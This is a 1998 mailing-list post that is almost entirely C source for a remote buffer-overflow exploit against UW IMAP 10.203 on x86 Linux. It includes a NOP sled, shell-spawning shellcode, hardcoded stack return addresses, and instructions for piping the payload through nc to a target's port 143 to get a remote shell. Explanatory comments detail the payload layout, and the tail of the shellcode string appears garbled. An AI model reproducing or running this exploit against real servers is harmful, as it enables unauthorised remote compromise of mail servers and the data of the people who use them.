new exploit for linux imap

From: carlosfdezat_private
Date: Wed Jul 22 1998 - 17:29:05 PDT


    /*
       UW IMAP remote exploit for x86 Linux by Juan A. Fernández Jiménez
       (carlosfdezat_private)
       Systems affected: only tested against IMAP4rev1 v10.203 (the nop, esp and
       offset values below are tuned for that build and will need adjusting elsewhere)
       Greetz to: Koji, Sud, Darkmoon, Marneus, NBH Group ...
       How to use: # (./imaplinux;cat) | nc target_host 143
                   (the program writes an AUTHENTICATE command and a 2048-byte
                   literal to stdout; the trailing cat keeps stdin flowing into
                   nc so your input reaches the spawned shell)
       Note:
       This exploit is based on the remote exploit written by Cheez Whiz.
       Feel free to change the nops, offsets and esp... the shellcode is
       all original from me... :P ... no problems with toupper()
                    ESP=0xBFFFF04C for v10.203
       22/07/98 23:26
    */
    
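    /*
     * Standard headers.  The original listing had none and relied on implicit
     * declarations of memset/memcpy/strlen/printf/putchar, which C99 removed.
     */
    #include <stdio.h>
    #include <string.h>

    /* Size of the literal announced by "AUTHENTICATE {n}": NOP sled + shellcode + return addresses. */
    #define BUF 2048
    /* x86 single-byte NOP used to fill the sled in front of the shellcode. */
    #define NOP 0x90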
    
    char shellcode[]=
    "\xeb\x33\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x80\x46"
    "\x01\x80\x80\x46\x02\x80\x80\x46\x03\x80\x80\x46\x05\x80\x80\x46"
    "\x06\x80\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xc8\xff\xff\xff/âéî/óč.........";
    
    /* The literal sent to the server: NOP sled, shellcode, repeated return addresses (filled in main). */
    char buffer[BUF];

    /* Exploit parameters; per the header they are tuned for IMAP4rev1 v10.203. */
    long nop    = 422;          /* bytes of NOP sled before the shellcode */
    long esp    = 0xBFFFF04C;   /* ESP value the header gives for v10.203 */
    long offset = 100;          /* added to esp to form the return address */
    
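    /*
     * Build the overflow payload and write it to stdout (pipe it into nc, see
     * the header).  Layout of the BUF-byte literal:
     *   [0, nop)                          NOP sled
     *   [nop, nop+strlen(shellcode))      shellcode
     *   from there to BUF-4, 4-byte steps esp+offset repeated as the return address
     *   last bytes                        NOPs the 4-byte stepping did not reach
     * The literal is announced with "* AUTHENTICATE {BUF}" so the server reads
     * it as one argument.  The return address is only right for the build the
     * esp/offset globals were tuned for; nothing here adapts to the target.
     *
     * Returns 0.  (The original was "void main()"; write errors are still not checked.)
     */
    int main(void) {
        size_t cont;
        /* Low 32 bits of esp+offset, stored in host byte order (little-endian on the x86 target). */
        unsigned int ret = (unsigned int)(esp + offset);

        memset(buffer, NOP, sizeof buffer);
        memcpy(buffer + nop, shellcode, strlen(shellcode));

        /* memcpy instead of *(int *)&buffer[cont]: nop+strlen(shellcode) is not a
         * multiple of 4, so the original store was misaligned and an aliasing
         * violation; the bytes written are the same. */
        for (cont = nop + strlen(shellcode); cont < BUF - 4; cont += 4)
            memcpy(buffer + cont, &ret, 4);

        printf("* AUTHENTICATE {%d}\r\n", BUF);
        fwrite(buffer, 1, sizeof buffer, stdout);
        printf("\r\n");
        return 0;
    }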
    


